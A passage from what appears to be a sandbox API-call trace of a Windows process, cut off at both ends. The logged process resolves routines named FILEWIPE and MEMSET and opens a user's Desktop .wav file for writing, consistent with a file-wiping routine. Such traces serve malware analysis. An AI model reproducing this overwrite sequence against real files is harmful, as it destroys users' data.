lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0030.044] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0030.044] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.044] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0030.044] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0030.044] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0030.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0030.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0030.044] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0030.044] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.044] CryptReleaseContext (hProv=0x7d5c40, dwFlags=0x0) returned 1 [0030.044] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.044] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0030.045] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0030.045] FreeLibrary (hLibModule=0x754b0000) returned 1 [0030.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0030.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0030.045] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0030.045] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0030.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0030.045] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.046] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.046] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.048] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.048] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0030.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0030.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0030.049] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.049] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.049] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\kYfCsY7fw675g46j6.wav", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5742c440, ftCreationTime.dwHighDateTime=0x1d5c5ba, ftLastAccessTime.dwLowDateTime=0xe91d5530, ftLastAccessTime.dwHighDateTime=0x1d5c009, ftLastWriteTime.dwLowDateTime=0xe91d5530, ftLastWriteTime.dwHighDateTime=0x1d5c009, nFileSizeHigh=0x0, nFileSizeLow=0xeb65, dwReserved0=0x0, dwReserved1=0x777648, cFileName="kYfCsY7fw675g46j6.wav", cAlternateFileName="KYFCSY~1.WAV")) returned 0x7c2100 [0030.049] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0030.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0030.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0030.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0030.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.049] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.049] CharLowerBuffW (in: lpsz="byte[60261]", cchLength=0xb | out: lpsz="byte[60261]") returned 0xb [0030.050] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.050] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0030.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0030.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.050] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.050] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0030.050] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0030.050] FreeLibrary (hLibModule=0x76b40000) returned 1 [0030.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0030.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0030.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0030.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0030.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0030.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0030.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0030.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0030.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0030.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0030.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0030.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0030.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0030.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0030.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0030.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0030.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0030.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0030.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0030.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0030.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0030.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0030.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0030.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0030.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0030.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0030.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0030.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0030.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.051] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.051] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.051] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.051] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0030.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0030.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.051] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.051] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.051] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.051] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.051] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.051] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.051] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.051] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.051] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.051] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.051] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0030.051] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.051] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.051] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.051] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.052] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.052] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0030.052] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.052] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\kYfCsY7fw675g46j6.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kyfcsy7fw675g46j6.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0030.053] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0030.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0030.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0030.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0030.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0030.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0030.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0030.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0030.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0030.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0030.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0030.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0030.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0030.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0030.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0030.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0030.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0030.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0030.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0030.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0030.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0030.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0030.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0030.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0030.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0030.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0030.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0030.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0030.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0030.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0030.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0030.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0030.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0030.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0030.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0030.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0030.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0030.054] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.054] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.054] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.054] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0030.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0030.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0030.054] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.054] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.054] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.054] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0030.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0030.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0030.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0030.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0030.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0030.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0030.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0030.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0030.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0030.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0030.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0030.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0030.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0030.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0030.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0030.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0030.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0030.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0030.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0030.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0030.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0030.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0030.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0030.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0030.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0030.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0030.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0030.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0030.055] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.055] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.055] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.055] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.055] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0030.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0030.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0030.055] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.056] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.056] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.056] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0030.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0030.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0030.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) 